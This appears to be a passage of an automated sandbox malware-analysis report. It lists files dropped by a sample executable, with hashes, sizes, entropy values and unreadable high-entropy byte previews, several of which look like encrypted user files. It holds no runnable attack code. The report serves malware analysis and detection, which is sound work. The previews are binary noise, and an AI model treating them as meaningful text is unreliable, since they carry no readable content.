              SSDEEP:24:o2WfsekuFtRGbVghlvCE05pVcfhnT5i8KIM1D2YYDTbvDR0JnjMtoU32I3mfU1ky:lysekuhGgT905vcJNOD1DXGzFOnYOU3h
              MD5:5BEA7E98FA04408BA8F88ED4617040B1
              SHA1:FD0F8671CCA488CE5FE518C25A3A04758F35948D
              SHA-256:803A9B6EB9DEBE3205C2DB1768E9E8B3EF617C6807CCB4FA720B9C3A43B51A77
              SHA-512:9D6C7E517822FFAB4AF295AE1623BC29C5D189F75599C4F2D68973B2EBECE32DB8E30F2A36DE9E1385462265BC1D4C15DC4BFF2CD80CC91768322AF88CF8670E
              Malicious:false
              Preview:SBVUS..<.+qd....6.RS..G..}...|..#4|=....v0.....8^..J....U.**..9O...YOW....v... |..#.?U#VD....q..9O....J.z...Z$.}..9p......mf.b.@.`y|:ws..8...~....z...w...>.W.IU.B.......c.^..I\Q........h.....+.1\z..n..)...xi...5.....O.u..(..n....,..~-0.x4S........A}.{W#O.1.B.u..]..v..<.x...H.>.6.M.>W.=#9..W.##`E|Q..|.UX..i.....F^)._"..C..*f...e\......R....u.4.j(.A..0.......|M..I...U..,I. .?....O..,n.l...=[.....b....}K.(8'Ui/.%-a...*..*x.S.,.av.z.../u1.r....../:./4./....K.{.DP.~.H."I.........1pc.).jF.N.5.%.L.g..B>..N..YN-.*.X.\.x.fs.D#jW.5;.s.....Y.\Z......u.W.......|...".cE...CA..O`..Ob..7....=.j....]*..w..h vo;........3..m.a..c../.KF..PtN.....c.)sT..l.....&Ay..%......f.@|.o&@.H.4...bB....O.K...e..z.U..).e...5).x....1QP.(..#.....<,S.0..^..!...b..}...'.l R@n.....-...?w+%..%r.L7..r-......^:.z<..(Z._S.R......9.Z..U,ut...$p..'........!7.>>!7.u.f`...p3Dg.Q.U.........;[J..CQ...).g..'O.`.-N..I*Y7"....W)y.m.....#*.4K..|...E..d.];..%3.{.d..L......,.anOvN,....U0
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1360
              Entropy (8bit):7.864590556276799
              Encrypted:false
              SSDEEP:24://2rAjbX2nDcHy+XNHki3txRprTtANbpFnLP5nF+ht3WUmJxkFzFHoFld+bD:HdfX2nuyghXRBTmNbppBnatRmHcJHoR4
              MD5:B19C6A2C1181AAC5A3867E5E155050B2
              SHA1:F5A39C710C9CF4C409A071203F275083316038B6
              SHA-256:635548244BEF15EFBA54A275B0C883329CF47C34D9651531E549C69AC58C4193
              SHA-512:550CE0CFADE84F19B93940F3526A16447E58F174108C968F907A4D10A677C4651BE46CECA226CACB2C3678633F8AB2B5FD576B4ECC2EFE49943C4E88BCB515F5
              Malicious:false
              Preview:TQDFJ......v)......q..Z...C.....j.+.....i....*.......?.......Y..=..:...@5..Q..KnL.h......= Pe...l...!....>j.?..d...<...s.)..*=.){. .....7.t$..L|.F...T....Dx..0R..7..I...._4!b...1......8. ..L..m1_EFc...O..J......8:.......\.oLgV).:..,\...o\..U.HK.....VO]..c>!..S....$...t..V<.&.0.r.C..\M.%..}.....G_7......TT...N........._.C|ys&.U.>.. ...YO.|...2f...KR.........T.Jc_....p.^.S.+..h.....q.ySp..8.I..`..[Y..1..a..*.=....Ds.a...%..9.x......ui...]Z...7.d..C....Q...*...K.MV.v...TL...HH....?...~&...Wz.A._+kZ.}.6.........p..H.H4.t.f.X.u.W..G.V...!...4tG.?J.MmB.]{.......1...t.?8b`Q..........T.0.P...f;..5.G.o.tW..j...P.J|..u......\.p..................x..c...6h...i...C<(..t7......N.RI..Y[..hK..D.B.....!...k.....c......<?g.4...~...8.\<E......e..w&P....n.}>..ev.....w.....a2U..TR.HY5.o.i.B"*W8....+.d.eq.....-..@O*.WH%Z...F.^.Bzy.w..X...666........(.Mh.8..sJ7.3..^.p..G.Qd...`/.sx...7_.......ARR.0.."......6..B.4.......2}..#......x.U34...`...f.!.+.3
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1360
              Entropy (8bit):7.853733681955026
              Encrypted:false
              SSDEEP:24:36EekfPf869+HIabWe1UqX7JYqG9Gu6RZiFzfqADXV3h1CPSa3+fbxm4died+bD:36wc68BWe1Uay5kuSZiFzfdDXVaPSWK+
              MD5:297325F363EC98D65679E06B39855E67
              SHA1:5F80D78D4EF557873940CF72913E3D8FB2FCBA30
              SHA-256:A123F490F6AFABBB9CC8FA353AB4B824A12C3B0D8B4A937F789557FF02C4C39E
              SHA-512:D6505A580D34CE35A1D05C36DE0FA962B15C82D7048B409178D1B9A702C077BE94BF8B1AE55E6F259B4D1D99D280D2C5B3809F0963C56A74FD0B1FC04636F394
              Malicious:false
              Preview:TQDFJ.E.QG....:)\.#...x..7.2......XYv*..?9.d.X.PC%...w.}..}....$.;..9.-=......*]....a...R.Q..Q......w.../t......6I...=.....9...Z....S...KtX...xm<8...M.........../b.I..#..j..h...=...2.y.@q...w....B.l...@.....}8B.f...p...-.|......S{+uf.:..8...L...Z).9....(..RS.....AG.8...D{.7I.\...>.....G....%.M.q.5UW...@.x&.z.N.t.(l.4....0..X`....=..:.bdZ........Ywx0..08...;.(,.....p.D.qo.......|.I...dq0..]...[.......Cx.)..4.|...G.x....$H/zJ~.Z#5l.!..*..P.N.(./...@.v.WG. rx..._...6 ...l.<nc...l...y...M.F....o.b.........e4..j.......2.&...I.ym#[(..Z.o.,Hi,.#.<mV)^M?K.L .$._. X$..j..}.I...f.u..-K...k.e.0..ow"95..`....O..Va9.{Cl.[..S...b8.l.cF.Hi.7...3..&'..|i?P.$.4..A.x.[.a...#...#}..X..7.&..c..!1..........].}.....V..Hd_.......V.._6._ ..b.k/9j...g1..0..(..f.*..0..W...I19+u..h..:.S ....e..(4E.x......n...\.2W.c9..G..d9.@.q.7.*.e#.s...53.!.....H.'....j.^.[.W.h.v......[y......2...n ...~.....P6..../T...y..|Y].bY...F/.A.....EI~Y.HD..i..g..k..x@W..2dh4R..|....U[..7b....v..
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1360
              Entropy (8bit):7.844995040435364
              Encrypted:false
              SSDEEP:24:JJIQDPSgpjnMutnZQqkC4ekepaOjA9bYZ/xsh9y34SckrIaIjDK1WA0xQqd+bD:J3PSg9nMutZQQJnaNY+D1KxYm4A0xQM4
              MD5:2F972D96C5BAFC1C80D39C89895F9FDB
              SHA1:38A204B5A9AB1DC1B6FE54A9FFB3028FF112307B
              SHA-256:0A1CBFB22193A4BA9279B09E5307BA092F2863A9264C328C29D8788A97A89BDA
              SHA-512:FCE76AF6D356976143C8124A12D47BB65150F3747E5E9AA171856EAC1FCEC942F15E66CC9B7390476718EB1D7EEF01CB1A8A98EC39909C6E341891A720A3E7A5
              Malicious:false
              Preview:UCKFKg$[R.C....Z...i.......3]..M.w.....,.\..axGIH....{#.~.+Y..A.+.5I.fm..S.a.\$}..p...lI#.V...x...j.;.^O(....V$......,...bje.+...M.0[..}.M.Lb.@.l.....EY[x.q..!.-W..5.Yb....$..r....~5..PQ.W.g._Q.).2Z(4...9P...kR.^8$P.m.xJt...5.I......K@.Lw`9"..r.)..."..Q.......IH].g...,"...c.q:...b.j..LR!..`.N/N..Q..PI.....F...d%(.....X.....W}?|qL....jv.I...T5*)G2Z.......D.,m^.]..0*..<..Q.AA.^....._.5!..H..s....u(...*..U..s...T....1K..'$.u..".r..(-...g.r.Y....b..K...\..&.Jz....@...b.oD.!!...K.6.l.,.F,D.:0..Y.&...}.JK.5^...i.........~lpU...,Z..._*.6..JN.4w$.....h...X<p..b...3.K.O.J.4...;.....".I....Oq[...@...2...4.../^.@~....J.s....W.....;)..... .ZS1.^..G...I.b..)i.;................75iL..{...Eu.q....W.....qn.....<.U..[NE<0{.".R>83.z....A_..........nX.b.8}.u.......Y.w#.zFw...P&.Z.kFD.-. ...l=...+t.^R.J..o<...0..S*..&%.U...!......35. .!.Q.]NO1Tb\#...An.p.B...=(i........f.WZ..B.0.u6.(..."z.;c'/4.y......wx..(.n&..]9.....e.............o.L@..zK.g..QJ..W......
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1360
              Entropy (8bit):7.855231440082981
              Encrypted:false
              SSDEEP:24:PuLxUztyP4c0VxOYeiKh/RIqUvSlXXVxo7g0iww2uMgj7Ueu32dMXwWzkdBxvd+X:2rknxe3RSQjAg0iwzuD7UwInzaxl8D
              MD5:FC13ED20A8C73C783F3F91AD19A81EA4
              SHA1:A5B70B8EBB0F3294F7D2FDF37D450DD9154D7CC4
              SHA-256:AB1E59D33F7F7734A5DBA13FEA1D7704723AA968697624E5BA780FAF8B1A9DC1
              SHA-512:3AB55ECB5D9ED56385A38FDFC042924B995AA31B9B21660C4E194C142940D5D72E8F8A809E3FE37F06E0FA78D09D13FE0670E732F21E232E521E5F23B4D87E51
              Malicious:false
              Preview:UCKFKENT....o..X&|.(.G..W^F..h>'. .w.......o..8r.A.bf.^....D.p....0.[..sD...d..\.r.I.v,.qB..-.a...@..Z2.B..cV.+..,/..4.......|_Tz...0I.7.u.".2T..X)..N.6`......e..&...u1>Z..O..r.&.m..~:W.U7.. .8K.y.l..Q...t...0..c& ..t..)-(.....6..n..B...5...#:..'>.4I..y.}X.B}.....&....^(......No..C..f...CQ."7.../..V..U....j(....!*|~.N.P..fM..'..1....QtB.M_......S.....N..m....dp....E..[5..3................>(A....)c.....!..Vl..B..b......l....Y..$.q...C..........l......%~..^.D._....o.I.....%-|.Z..880.({...} ....Y...D[.....4q.I..............N@.....n.8.B.D...x.>h..s...r.X...)`w..*H.....v.....n/E9!H.lo......q.[~.j|...,....e...R.{,S...hF.g...8L.>..3.q..R...Ma.....v..U.i..,....LN. ...fr..9.!..AX...=.~..+...g..R....n...J..[......8.k5 .g4.~..).l....HCy~.......!..@..B...#../;.R.;. .K..^HL./...j.....J.O.o...6T.5.?...%?...-$M?Jj}C_f_6...4.. ....>.\#....!....7x.nz...HC..o........Wo y8.......Pe9.".....!...x...qDF...|d.i.5T.To...]O<^_...{.s....p..S...2.:..S....3.R
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1360
              Entropy (8bit):7.827566026705209
              Encrypted:false
              SSDEEP:24:VepvII5Ak/xp457XRKzbxhoSXcV0uE7qVGRED+CKCPmSN7LojdEISTsEolLTd+bD:V0II6kxp457XRKpyq6xeEDwmj7LUdEIK
              MD5:F678CD814C999A50EA1D7EB094CED00B
              SHA1:1ECF3E30347A4F4064300BC0CEDF1D33DD317614
              SHA-256:15F16802CB9E0E9CF805C27BD237E535B3320B6E731B131E7989A5DFEE5BC32F
              SHA-512:C6B3A3B75CA86296728092C47FE5AADB1AA930056B6639E8602EF07A57E118282E4FB2096419B8C2540FB1840D50F6FAFC418FE107A9678444EAB2A60AE6F751
              Malicious:false
              Preview:UCKFK.~......FBa.2H&]<..x.Oo'..I./.g%.._..(.i.....k%2...x..X..L'r.l7..'...HNK.....0)o#4....Hu....{.r....n%.....|%.o...\.A=...?L..p.x...@.!....K\.Y.C\..[....W.F..,OL..o. ..j9.7..u.6..2..;C.....Mp./....e.R.26.a.Q.....n.3U..b...A.78......-o.....^!........^E.....9.PS.V....$/..]H.:.H.[..f..a...d..<!.P.P...Ah.|.5..uKlQ..\UW..0....(7r.1N.g/a..^..........N.q.Fx!..z..q..#LU{.+...B..\.N.......XL..e..9..r+,>.......$...H.#.....-...WB.MH.@.U.C;..w...y..R..T.y.....b.1`..{....:..~.-.* .w.....>.5.....t..|l..e7...l...8.x.c}..D.0.Go@....K".=..$.K......9..9'.9.]'..0.Q.c.+....%:..$.MGB....e....s.f....^.'%...^~!.K...V.2..p>..M.j...}J....a[....>.......L...OK..gl......'t...T...8...Hf....O?.8@Z..o..H.!..d...'<l[....~.:.A1......2c...R....O+.........r..~...H.....>.(....c.........X5.>2.....}J%I.....Y.M[....8..(....<yK.ts...kr.q.......I.....oZ...P.S..?}Y.L..Q-7]I..<.X3......./.....].Z..$f.^.....$Y[.s%.vv..O...h.....x..QuZ\.{...N...}S6.q.p.=.q.....H3cs...]G....N..t.r.@.$....
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1360
              Entropy (8bit):7.8663218633522725
              Encrypted:false
              SSDEEP:24:XkKNxNKai1h111tbTAJsmtyPjhFyg1Q/yL6k1v726yH6jOomqS6Ypaz5ftIZ3UH2:0KHNZILbT+kjvyle1Z726pjG/WSZEHEl
              MD5:BE53D79CF791DFBD9A94B5CDBA03ECC2
              SHA1:7D2BCAD578BD0718128E25EB7ABFCE6FBA7F687C
              SHA-256:2EA24C3A7221C449C934CE52212F9494DA0DD41FFA064DAE7D12F8B4E0708623
              SHA-512:C9823AA0474DCECE801A8E68CA5DA9351B935ED440B71A481D7083797BA437CE86E99DA53A3AEDB6B1A0A6C63657EFCEC7EA2861225AA13EC72737B2FC959BD2
              Malicious:false
              Preview:YYTXS....L..R.J....=....m^...!i..r..g.P.CG<..v..)....kR).9;l..h..*..`A..sC.D.%c..D.J...h..z....>..F.W9.'..".w...k6X'.Sy....G..)L.......0.R..$9..;..t.l.R....mP..i.?..D..^.m..9A.2[[4.[~.......k..;KE..K....H:..u.].H...q....wb.,....x(.....j6.~5..ht%..j..fr*s&..N.,q...m..@...n..m. r.....e..h...J...i......u..?.ElK...-..[.[.c.oHr:g.k.gv.-.V..6Pf ...4.'d.c...".D.......C'..L#..Wqz..u?.qyh_..H.......^.....eU<.F.!.\.j..:.(..{.......ke.ZB.X..-.1..}6...*.[C...dh.!.p8...)5FB.,..;....L.1.'.F!.......X.m..%...}...#3....##.2..g..1.g..-...g|.k..C....:..s....u;$......o\...u..(..&.....P[.*...iLcN,....._.QW....*..%..-. Ba.-..t........(....T!...m...a..G....y.m.CI..Ry...=.Jg.O$.I9...xh".I..*b..,.1.f.....t..=*...q...y..+..0%.U...@.t$....d..h...+.....At..Q&.^.[i....ZT^.UW+...!...IW...........R|..2..e{.T....UA...IY$X...6._..'.....Y.......Fw.%".......|8......:41K...?.....-@A..a...?Q...o1..;......)...}...n~o....!....,__.{..*.m.A.2^.'.L.ub....z=.2RJ. .2^....
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1360
              Entropy (8bit):7.850348668836958
              Encrypted:false
              SSDEEP:24:iDG5+UdopxBoo21CT2UJ7RkLyLMcEgttNM/3n4uKaRrIkVMCoKd+bD:f5rdMv213LVjAa/34RGrIkVMCos8D
              MD5:4CE869AE3BB5C74702255E2A0388819E
              SHA1:0CC3E86C05CE5906FD8D9BBF0E7266BAAD822F76
              SHA-256:9B2E1A3142122009BB89F055B2AFEEBCDAE1C7012C1657B8D24C27A19135B942
              SHA-512:15E89672D7AB44494E815C30086F93C8DC85149E7702B1E387761460F8845D5529595336581A509F8C17A13DFE0D769FA62C7857D784CC83B879A66E7A3CC289
              Malicious:false
              Preview:ZYXFL]...:.(.I.}(.R.pm.x.0.C].y..-vDy.:.......@.mD@;p...Z#...G..D...g.*..p...t..........QG...(...m.O[..[.n.t-.J...*.W.!.Z)N.}&.9,..MQ....nv..%......'..b.p..xV..N..V/.L.. j-.._.ML..........!R..D?..g.....)1<....a.F.;...[.<........"...ve.K.|{H./.....".2..(~.<...M.=......x.>..`..:5..C..">...f..G-.1t...%C...P.3...=.q.R....=.R..jv#.E..k.Et0.y1.Z.i#....Z...'f1}...Y#[....h....`.2zG.S83..*.*....... .h.j.....l.......l#.....xb.YY.aMk|...}s....d..H0+.,.RS.K.k..!...q..N....i.......?...R.Xftb$(......D..q........#.q.Q..{..u....,yM..;BbQ"1$w...s..q.+.......c.i'.....G.Vj.Sz.%.ux+8.....Y.I.tm..!..0mS..5OY[.^.^E..G...~.I.gy...K4v.].K.3.hS`.V........_..%U.8..6^..~...gW.3...7..M}.Y...,^....s[k....:.}X=...r.~z.#1....Z.$....k.aA....r.<.r.0q)WZ...Z.Hw.]p..C.r.0Yc.`.b...:..7;......b...f..6.......E..!*>#K.QZ.03.a...JN.0.4...4.A.....q....+.J..9N...R.5H.noO,........J{....<..ZJ4.].C....X..`..jV.`...E<.*..8R..?s.,|B...ey\...hF...]....S...R.j1.l..q...ukW.u
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1360
              Entropy (8bit):7.845079166445456
              Encrypted:false
              SSDEEP:24:nNse3rjtgLemKJhIBPnJkEOjJtURlWJLHYNQuJh0jLd+bD:NsOjtgLeNhIBnJqVr4tyd8D
              MD5:4FCB4605E100B7076CDA12952EF43AB2
              SHA1:EBADC260D7FD43F58B1819C0AD1CAFA655520A9F
              SHA-256:A826224CA5CEE3AA9E01984F00EB2836AAA369E1FB7A4824B677F47543CC3CBA
              SHA-512:808CE2F32ADD844F7033DB1F63B17F2D89CC4AA8637E0A966E7338CBE1EB70C2E6881BAF59D094213A667C22CC81F1573F764DABBFAE8A39B72F4D2751403A76
              Malicious:false
              Preview:ZYXFL3..hP....R~$.......T^..E.p....r.U*.."..Sr.+E.n...F....aj.nV".-.u..'.w-g...LC....Z....?...".v....n..^.#..@.../.Z.....gbhcT.#.N..D......{..AZJ@i.. .U...y..d..V..... ....a....*2.......>.Ud........L...s.3....-3..o9.fX.g&;....}.w*.4}.I......_\Z.%.A..\...cfr.a..DL..^...]uIc.^.F@QS...;X.3.$.\.$.epjUZ$...B....G.tT.BCb_*..Y.vc(6...7T:;....^o7$$^........8..3q...$l..F...p...F...^.E....p....z...O...H.0..C.....(...lj'@.C.g..ZK>F>a*..aA.#`-.k.EkxiA. .0..ab...$.m..0TzDLW;...?...........k...yt..!.....B..........,......)-...u...G..+..../[...[.f....xq%`.M....)2u..m.Y..c2E.6........@.)6...J.=06....~.W.4B.W.aKh..m....a...!y.O..i."....-..F.x.w.3. ..&.[&(....I.$X?.t.......,..O@8..R%=wp.".f....L.:.....I.....0k!.../.......Lf.`h...8.T>..]v_...)t..........7.l.!?.}.~.h>5u=2.I[R..{...G5.X....*..@J.N........5U.. qFj.`0.oW>eIh...'5Nx.V.X.ZP$ .c.......f..*...*.Z...m.V..z,0..^<.M.p}..z.GXZ..J.....&.R...Z...z}....O.b}"....&..P..0....9Q1......L..n|.9.._*...gkD..XF..
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:PostScript document text
              Category:dropped
              Size (bytes):1567
              Entropy (8bit):7.888623250694874
              Encrypted:false
              SSDEEP:48:wsmeCp74I5k03J1VDr2NxsamS9mpFUoL/J88D:PqkI1Bmxsam7pFU0L
              MD5:20CE0AAF92DDE530154D452993920675
              SHA1:480E9A45B705E5DE430C40073AC8A1D7D775A5B7
              SHA-256:C682E03B62030BF8CB3C916390D5B25F8A2312EB31D444B5411C481F152B55DE
              SHA-512:16693A78F367EF544C43E6267C309695A3645882DEDBF9E4AC3D30DB88FD028A677BB0AFBDAD062724FDAEB3774A8518E28BAE6EA6BD8B9AFF25095018C8BE22
              Malicious:false
              Preview:%!Ado.G....W.A.8....-K4...=h.:.n.E.[..........h.!..+8.......&.A;...JB.u-Tz.>...:......m.@i......]......aFn.;.^.;.I.wB...}r.......9h........h5jsIUE.qJ.x.2.pPNV>.............M....%o.0,.h.<B..E..&..........F....:.....5_.F|RN.c...2l.....0.uM.6.....he..k.v.c.S6.....m..s63.-;1K.1..22.y.*....^OhM.*...9DB......._...x#g1..oe.[...~*.M...*.$J...FK.}<.S?.+.4~6Q.B...c....$D.a......5......Z......z5..h......1...kV..._J.|i...A.s........iK....6..">"..^.\a...U......*.G...e...uC2/k....A..;r.s.W..N...m...".......J$.;&,:.i"..;..&)......<J)....8.n..}N....M..ko......xz.13._.e-.g ..@o...x.....7.S0.(u.[.wxx"..n..=0z.).P...f.:s...l...#@X19pbz.=O-.....|..Z..-.f....[...B....>_.. ...)....8m_.....P..SX....'`!.B5.i...X...C..../.wUe..V....;..B..T.w.Z..(....*+...+..4...~.JA.R.%N\..7.....T..R.v.=Q.]...q.?..JY....O.....J ;....a...../....4_-r...X.......,%s..wD...R..7V...g.Ne.h.f...9[W..3...O....K..#.\.|y.'x....fd.m....,.&.]}y..qs...b~.n2..Y..(...!G...0.k..a..R.?&....D..l..kN..
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:PostScript document text
              Category:dropped
              Size (bytes):185433
              Entropy (8bit):7.877186948530435
              Encrypted:false
              SSDEEP:3072:GeZiIv2K21aOLdKpyVzar2zclTbhXaf+Nr5Urz72H4u+mbncAIXE07ZmandGCyNT:GeZiQ61aOLdKpycrxTbS+9wz7w+usXEZ
              MD5:4062BC6C7076A76C981F6EF6D5054080
              SHA1:1D1DB70419E407A8745433F0B3DB7A4278315132
              SHA-256:FA4FAC66C97749AB0587F7C1B01C37EDA1593B89F6CA03271236A799DC0E197D
              SHA-512:54CCBFE00892365EC0ED56005FECCC407C8BE63B0D6F6FB2727BDAA91C51E21B00F93D58FC3F7FC69FDADEF6475697C2BF3FC166CDED6D55949A97BF0B837226
              Malicious:false
              Preview:%!Ado..+=..F.M_....n.`......=.......j.........N.....a....-...5......U}...gG.@fp...m.C..E...wp A...y.z.9..=..O..5z...B..4.urZ,J.Ts....._.+.6-......W....h.%...5.g......&..x..u.!.%S.......O...AJ."xx....4.kA.=..j.,...$.C..hC.f....A...[_fo....N.4....%T...4;(....*..k..v.?..'.^x.e...fug...w..X......6..z.,~..Z.a.`V..H..p.F._hN..x....%../,..I...ab...1.....D.......w?s..-.`..|.).......L...y.W..l.Y....)...6...s.2d...6..{.W.4m....O.h_q.@4-\C..,q..@.G..`.....]....P.%.Zh..47.K..........FV]g.E..G3....9.._......E...'..". .B.7......Ur..#.5U..Ji.... <}......=$mr..9.....r.y.O.d.=.A.:f+f.`...]..q.cm.#.....u|.y..~....h..-.uBX7...cf5....n..^.g.'..W.k...vB...q.A..^..`.....m..k..E.F...).d.nh..'....nN\M....N.e.Kh.O.?=.mZ..".?{o.6.[[x...@...,.T....A.?g...Z^.....l.,'^...Rq....E.a......S...^.L......cK(....Bn...G...r...f..F.....8r.=...2..3. ..D..4..#...%3..!...zU.x.Oy..s.I........)>/...4av....T...H.xv...!./..Fw..I.L.t.jVY33K3jjn.l:g.*..C....c>.!%.4!P2..".
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):227336
              Entropy (8bit):6.985727796008925
              Encrypted:false
              SSDEEP:3072:HgG/L1AjnIOv8YFOSLwbyq3HEKtOZKcQV8LxWIkDwbSuNfa9/NAOoWiRn1:f2I1SLRq3MZKc1WHuNTn1
              MD5:8D98FBF3B4E9C94F88D57B91AFE32D78
              SHA1:7A31ACCDE3949184C156F0F0A3DE7DFD17163DB0
              SHA-256:E7A4A4A844521B94BF6566DF2A6B95DC03833D92FBEDA1E78D9A8E3A813F4F25
              SHA-512:994CE1161E3DD079506DAD50B9492635D2D36370DB774F5999ED132AD30707547B8A470C5E0E18F9BAA713D8E73A599D1DEB70C754A57C21EE1E27FD2A10101C
              Malicious:false
              Preview:AdobeVH..G....?..+..v..]I..=.<...|..U.o5.N..q....8..:..Y.y.P..k..K.K.9<.c`].-.......G........:.!.kg.p.;..=R...w;../.(......ya..g.Z4.....}".*...eR.].0...H...2K#z'.]..(...A.K.<M...K......$......h......w:Dt......y.0D..T:.b. ....ZQ...J........C)N..>.[...h.p".j.y...bF...}E.....v.7.k.....]Thg._"..I.utP. 5.f....E4.H.9.6........-..~...C....)s.._i.....&../<.x..|..."..B.5>...X.v..........i..j.4.l.......g.Yh)._.y..../.(...(......Tg3.i..[..L=...Gy....x....v......f..4..~..3....G....0.._...'......... ...Kj..i..Q.... .}.... .W.."L5....U....5:E.....j.....\+x.....]86.,..K.5..U...=.."......J..k.....!..'......5..^...d.Ka....KJ;&.....|l...T..<].%!....o.N.......S...u..O...f5..u.O....Ro'2...........)aK@....|k.._......d.p(..na.j...P.@....(LC.7..G..l..t.B&.........%.r}.....S...btp......../....:.......t_.f..o`?.....%/f.K.....Y.....x+.4..|.&ZIfC..'ZnDJ..v..*#V&9..L...Q-[.f.Sv....2.blu.}.1......|.Kl'...X.+sX`M...Xg.uDmp.c.7...#.E.K..y".M.l-.y..3.xw2..B,W*-..
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):67060
              Entropy (8bit):7.997356310303559
              Encrypted:true
              SSDEEP:1536:7CaEJarXXzCmvv9ZsFOGgtTJo+ioXfnbG9wi7Q2xjZ9k6FRx:2b4rXumvF+fgttsoXf69winxjnkI
              MD5:36E63BB78DAF49006E0E7792C18940ED
              SHA1:AE2E4220E8FCD95FD6A1DF197B7E317DCE9E865A
              SHA-256:A6F27E1E4F47A22188784145C81F1168F22F470FF79DE4BE76D2DAF73FE5BCE7
              SHA-512:D127F7D321F05E8241A800DC1C2EBCE7F1B81FDF3BCF0155A99DB64B8A54704A8588297D94F3D45953CFF55F25695D4D43CDEC3D4C3381640144FD852E0BED20
              Malicious:true
              Preview:4.397..6&.F.l..Q..U5........4...>..GR.Y.....e.bY.o.>)..__..j..d.u~Q[..Z~g'........I..h9e.D\...cW)V.;.A.o.1..e.....<.r...C.T.....O_..*8C.J..A..v....vI......@Yr0g.|.0.P..crjC..iV.n..N....F.:...yKH..C!.. .].........3....`<.anf.8u..,..(.`...OC.uw.^T.`>9..YqI.S...F8.Jdr./]..y.... ..i.f?....uX.W.hm..w&...'.J...t..f..X..%...2..X<.y.-m..&B .....|.0...}ZQ.Ww..T..Ls.z.5....~.|-m.^.\/._.$.r...QW.%A.ki^..8W/....9..[......a....<..2.e&B@.g.H..T.Ai9..Kl....W@.....C..1d.....@.t...]n.#......._!z..+.........3B7..A.......Z...Y4KQ*..,.Bi=.;.`. ...XF....T..Z!.K...To..6&.3x.. ].....e........M..2...e....Z*H.,..R..]...?.q.]...\.......P.s.D.v5By.;V9jm..P.2*....q.....q.y$.e@LMq2...T>49A.l.w.<....F..2ml....v3..h.rNL.y!..q ..`..?....Z!.....q9k........F..U..(.....@.#.s.c....H.5.XcL.R.....8.4./.%...Ml.F...Hv..j`&oH.9..L._......`5.p..G..M.e._O0.&..=...,..2.0..!V..?XV.UQ.j$.....IQ."y.6!:......;4..JZ....#.*..9s.`..6G.\Bt<.b..!............-=.<(\.$>.]...3.ret.%m?.f.....
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):49486
              Entropy (8bit):7.996136625089054
              Encrypted:true
              SSDEEP:768:yR8w39Wl+90c5UVqim8UOvgNeG7VHa4+Emqzjp78jV9BZe/69n0uuiw48:yj9AC2Ye6F7Vhzjp4Te/Unxuiwj
              MD5:DF1A855524B60C45AA1690D18C3B5445
              SHA1:B28415AD33F15D600A33A043D9274A08839E9398
              SHA-256:7D796BE196F6B3919ED0AA4B47D874CB588C08C383764BB47335431A0E591123
              SHA-512:38F1C7BE7E46B73940A6CB974FE74BD6A7238792CA40AA461A1CACB434E8CD4D213B47FD559B19D45A2AD97248E3561E390B5893D7E49C467F2D368F28302EE3
              Malicious:true
              Preview:SQLit...M...D..@..>...f.!_...(Zr..3.A.H.2.8i..*/.1.6......bn.@Rw!....A..m5...z..F.2G.h..@.`.k.1../n-...q/....##..o...{J.d.sD..).......p.....C...hz......=(S...Ca.E..,[...6%>....l..OK....$.uX:.i..H........m..B...<?..h;....t.E.e....s9.........v.[.....xv.D'n.a.S....5..$...a..H.w$Uf. .?xM......DQ.h.......m....A...0..B......CS.I...n.+}..>L.D.w6......a....ji.'..../..._..A......"M...t(c(.?.Mqm..8..'.7pR.d.S.4u..Y....>A_.n.n........j..P5k.@..EE|.t.i...h%....\.....I.w.X...0p..0.7.'`I..dg..6.]..YQ.....}.:F?2_^_..".h0..#3M..@..G!G.q.K..g..]GXP..}.....*....e`.7y...C..........(.".....V....w.......o9.A.9\....R.|Fd....U........H..J/........Jy.V.qu..b..op.R...>#?...jB.......L._...."$/"........o......Q............P.S6z1a.=&.F..v.s"U.w..AS9..o....u......L....I;(..?..v2*.....`]sPq.Fd`.H.s.JFH\..s.C.....|.o"_............k.s./bS..v....U^..r......@.93...{_`S...6..?|.-g..XN<s.AX6...'.z..x.uqM..;....b....`.'8S .Q.h.8/....P....{]u...).._..;\F..AQ.3."[....{...r&l.
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):354
              Entropy (8bit):7.28088123997377
              Encrypted:false
              SSDEEP:6:Q5RlYYv194XNSm4STKsDErRJdYEUxns9QTfgeSIUpbRCI9fMfgmSdxa3cii96Z:QNIAmRTIJdzjASb99fwgLdxa3cii9a
              MD5:85A6C2E8F4BC78B3A46E6787B8017D75
              SHA1:9C3CFB0D77245ADD0F0690239FFD1CDAA4C9D0D1
              SHA-256:84C1C1BE8E184A5F6E89AEA62E2EC8E9E721E856BCC28110B8731E3682ABBEB5
              SHA-512:CA5903256593AFA77928C3DE77394BD522F1FC442743B51B9462FF525EB92A27A169138A66A1AA48EF97CF55D6DBC7AF0D0576C3D43FC1974E5380FB345B11A2
              Malicious:false
